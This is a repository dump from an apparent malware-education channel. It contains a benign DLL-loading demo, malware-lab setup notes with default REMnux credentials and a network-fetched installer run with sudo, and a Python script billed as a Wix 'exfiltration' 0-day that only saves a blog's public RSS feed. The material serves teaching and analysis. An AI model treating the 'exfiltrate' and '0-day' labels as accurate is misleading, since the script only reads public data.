-------------------------------------------------------------------------------- /videos/pe-deepdive/example-dll.c: -------------------------------------------------------------------------------- 1 | #include 2 | #pragma comment(lib,"user32.lib"); 3 | 4 | BOOL WINAPI 5 | DllMain (HANDLE hDLL, DWORD dwReason, LPVOID LpReserved) { 6 | switch (dwReason) { 7 | case DLL_PROCESS_ATTACH: 8 | MessageBox(NULL, 9 | "Hello from C0SM0!", 10 | "CosmodiumCS", 11 | MB_ICONERROR | MB_OK); 12 | break; 13 | } 14 | return TRUE; 15 | } 16 | 17 | // cl.exe /D_USRDLL /D_WINDLL example-dll.c /link /DLL /OUT:cosmo.dll 18 | -------------------------------------------------------------------------------- /videos/pe-deepdive/example-exe.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | using namespace std; 5 | 6 | int main(void) { 7 | cout << "Hello, World" << endl; 8 | 9 | HINSTANCE hDll; 10 | hDll = LoadLibrary(TEXT("cosmo.dll")); 11 | 12 | return 0; 13 | } 14 | -------------------------------------------------------------------------------- /videos/pe-deepdive/example-exe.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/pe-deepdive/example-exe.exe -------------------------------------------------------------------------------- /videos/port-knocking/README.md: -------------------------------------------------------------------------------- 1 | - [Video](https://youtube.com/live/u_zp68w9ixk?feature=share) 2 | - [WinSock](https://learn.microsoft.com/en-us/windows/win32/winsock/getting-started-with-winsock) -------------------------------------------------------------------------------- /videos/qemu-malware-lab/README.md: -------------------------------------------------------------------------------- 1 | # QEMU/KVM (Virt Manager) Malware Lab 2 | 3 | ## Install QEMU: 4 | - 
[Debian](https://christitus.com/vm-setup-in-linux/) 5 | - [Arch](https://computingforgeeks.com/install-kvm-qemu-virt-manager-arch-manjar/) 6 | 7 | ## ISOs: 8 | - [Windows 10](https://www.microsoft.com/en-us/software-download/windows10ISO) 9 | - [Ubuntu 20.04](https://releases.ubuntu.com/20.04/) 10 | 11 | ## FlareVM: 12 | - Windows-based malware analysis machine 13 | - [spice-guest-tools](https://www.spice-space.org/download.html) 14 | - [FlareVM](https://github.com/mandiant/flare-vm) 15 | - [Tools for Malware Development](https://github.com/CosmodiumCS/Malware-Development/tree/videos/tools-for-malware-development) 16 | 17 | ## REMnux: 18 | - Ubuntu-based malware analysis machine 19 | 20 | ### credentials 21 | 22 | | Entry | Value | 23 | | --------- | ----------- | 24 | | Full name | REMnux User | 25 | | Username | remnux | 26 | | Password | malware | 27 | 28 | ### install remnux on ubuntu 29 | ```bash 30 | wget https://REMnux.org/remnux-cli 31 | mv remnux-cli remnux 32 | chmod +x remnux 33 | sudo mv remnux /usr/local/bin 34 | sudo apt install -y gnupg 35 | sudo remnux install 36 | # reboot 37 | ``` 38 | 39 | ### blue jupyter 40 | 1. clone the repo 41 | ```bash 42 | git clone --branch PMAT-lab https://github.com/HuskyHacks/blue-jupyter.git && cd blue-jupyter 43 | ``` 44 | 2. run the docker build 45 | ```bash 46 | sudo docker build -t bluejupyter . 47 | ``` 48 | 3. start the docker container (note that `-p 8888:8888` publishes the port on all host interfaces, so keep the host on the isolated lab network) 49 | ```bash 50 | sudo docker run -it -p 8888:8888 -v /home/remnux/blue-jupyter/malware-analysis/dropbox/:/src/malware-analysis/dropbox bluejupyter 51 | ``` 52 | 53 | ### inetsim 54 | 1. edit `sudo vim /etc/inetsim/inetsim.conf` 55 | 2. uncomment/comment 56 | ```bash 57 | start_service dns 58 | service_bind_address 0.0.0.0 59 | dns_default_ip 10.0.0.X 60 | ``` 61 | 3. 
run the following in a terminal 62 | ```bash 63 | sudo systemctl disable systemd-resolved.service 64 | sudo service systemd-resolved stop 65 | ``` 66 | 67 | -------------------------------------------------------------------------------- /videos/qemu-malware-lab/personalize-windows.reg: -------------------------------------------------------------------------------- 1 | Windows Registry Editor Version 5.00 2 | 3 | [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize] 4 | "AppsUseLightTheme"=dword:00000000 ; 5 | "ColorPrevalence"=dword:00000000 ; 6 | "EnableTransparency"=dword:00000001 ; 7 | "SystemUsesLightTheme"=dword:00000000 ; 8 | -------------------------------------------------------------------------------- /videos/tools-for-malware-analysis/README.md: -------------------------------------------------------------------------------- 1 | # Tools for Malware Analysis 2 | -------------------------------------------------------------------------------- /videos/tools-for-malware-development/README.md: -------------------------------------------------------------------------------- 1 | # Tools For Malware Development 2 | 3 | ## Resources 4 | - [tools for malware video](https://youtu.be/thotsOZtmus) 5 | - [setting up development environment video](https://www.youtube.com/live/6zp9xdpyaOk?feature=share) 6 | 7 | ## Ninite: 8 | - Chrome 9 | - Firefox 10 | - Discord 11 | - VLC 12 | - Java Runtime 13 | - .NET Desktop Runtime 14 | - LibreOffice 15 | - Python3 16 | - 7-Zip 17 | 18 | ## Editors 19 | - Visual Studio 20 | - Visual Studio Code 21 | - HxD Hex Editor 22 | 23 | ## Visual Studio Workloads 24 | - Python development 25 | - .NET desktop development 26 | - Desktop development with C++ 27 | - Universal Windows Platform development 28 | - Visual Studio extension development 29 | - Office/SharePoint development 30 | - Linux and embedded development with C++ 31 | 32 | ## Visual Studio Code Extensions 33 | - Python 34 | - Hex Editor 35 | - 
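#!/usr/bin/env python
# videos/wix-0-day/wix.py
# exfiltrate blog data from wix sites
# created by cosmo
# video: https://youtu.be/wzfWjTVdvDI
#
# Reads a Wix blog's public RSS feed (<blog url>/blog-feed.xml), keeps the raw
# XML under xml/<site>.xml and writes each article's HTML body to
# articles/<site>/<title>.html so it can be viewed in a browser.

# imports
import os
import re
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

# output directories
XML_DIRECTORY = 'xml'
ARTICLE_DIRECTORY = 'articles'

# wix default namespaces
# (dc:creator lives in DC_NAMESPACE; it is not used by the current output)
DC_NAMESPACE = 'http://purl.org/dc/elements/1.1/'
CONTENT_NAMESPACE = 'http://purl.org/rss/1.0/modules/content/'

# anything outside this set is replaced when a feed value becomes a file name
_UNSAFE_NAME_CHARS = re.compile(r'[^A-Za-z0-9._ -]+')


def safe_filename(name: str, fallback: str = 'untitled') -> str:
    """Reduce *name* to characters that are safe in a single file name.

    Article titles come from the remote feed, so they are untrusted: a title
    containing ``/``, ``\\`` or ``..`` would otherwise let an article be
    written outside ``articles/<site>/``. Runs of unsafe characters become a
    single ``_``, leading/trailing dots and spaces are stripped, and an empty
    result yields *fallback*.
    """
    cleaned = _UNSAFE_NAME_CHARS.sub('_', name or '').strip(' .')
    return cleaned or fallback


def site_name(input_url: str) -> str:
    """Return the directory/file stem derived from *input_url*.

    The original ``input_url[8:-9]`` slice only worked for
    ``https://<host>.com/blog``. This takes the host from the parsed URL,
    drops a port and the last label, which gives the same ``example`` /
    ``www.example`` names for those URLs and also works for other schemes
    and TLDs.
    """
    host = urllib.parse.urlsplit(input_url).netloc or input_url
    host = host.split(':', 1)[0]  # drop a port, if any
    stem = host.rsplit('.', 1)[0] if '.' in host else host
    return safe_filename(stem)


def text_of(element: ET.Element, tag: str) -> str:
    """Return the text of child *tag* of *element*, or '' if missing or empty.

    ``article.find(tag).text`` raised AttributeError on a missing element and
    handed ``None`` to ``f.write`` on an empty one.
    """
    child = element.find(tag)
    if child is None or child.text is None:
        return ''
    return child.text


def fetch_feed(url: str) -> bytes:
    """Download *url* and return the raw response body (connection closed)."""
    with urllib.request.urlopen(url) as response:
        return response.read()


def main() -> None:
    """Prompt for a Wix blog URL, save its feed and write one HTML file per article."""
    # variables to change
    print('[!] URL Format : https://example.com/blog')
    input_url = input('[~] Enter Wix Blog URL : ').strip().rstrip('/')
    # urlopen also accepts other schemes (e.g. file://); only web URLs make
    # sense for the documented input format
    if urllib.parse.urlsplit(input_url).scheme not in ('http', 'https'):
        raise SystemExit('[!] URL must start with http:// or https://')
    url = input_url + '/blog-feed.xml'
    file_name = site_name(input_url)
    path_to_xml = os.path.join(XML_DIRECTORY, f'{file_name}.xml')
    path_to_articles = os.path.join(ARTICLE_DIRECTORY, file_name)

    # os.makedirs instead of os.system('mkdir ...'): no shell is involved, so
    # the typed URL cannot be interpreted as shell syntax, re-runs do not fail
    # on existing directories, and it works on Windows as well
    os.makedirs(XML_DIRECTORY, exist_ok=True)
    os.makedirs(path_to_articles, exist_ok=True)

    # retrieve data
    data = fetch_feed(url)

    # write to xml
    with open(path_to_xml, 'wb') as f:
        f.write(data)

    # parse data; the feed is remote input, and stdlib ElementTree's
    # resistance to entity-expansion attacks depends on the linked expat
    # version -- use defusedxml if this is ever run against untrusted hosts
    root = ET.fromstring(data)

    # iterate through each article (each item also carries description, link,
    # guid, pubDate, enclosure and dc:creator if they are ever needed)
    for article in root.findall('.//item'):
        title = text_of(article, 'title')
        content = text_of(article, '{' + CONTENT_NAMESPACE + '}encoded')

        # write content to html, view in browser; the title is sanitised so a
        # hostile feed cannot choose the destination path (same title twice
        # overwrites, as before)
        print(f'[*] Writing "{title}" to html')
        article_path = os.path.join(path_to_articles, f'{safe_filename(title)}.html')
        with open(article_path, 'w', encoding='utf-8') as f:
            f.write(content)

    # notify user of output
    print(f'\n[+] XML saved to {path_to_xml}')
    print(f'[+] Articles saved to {path_to_articles}/*.html')


if __name__ == '__main__':
    main()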
--------------------------------------------------------------------------------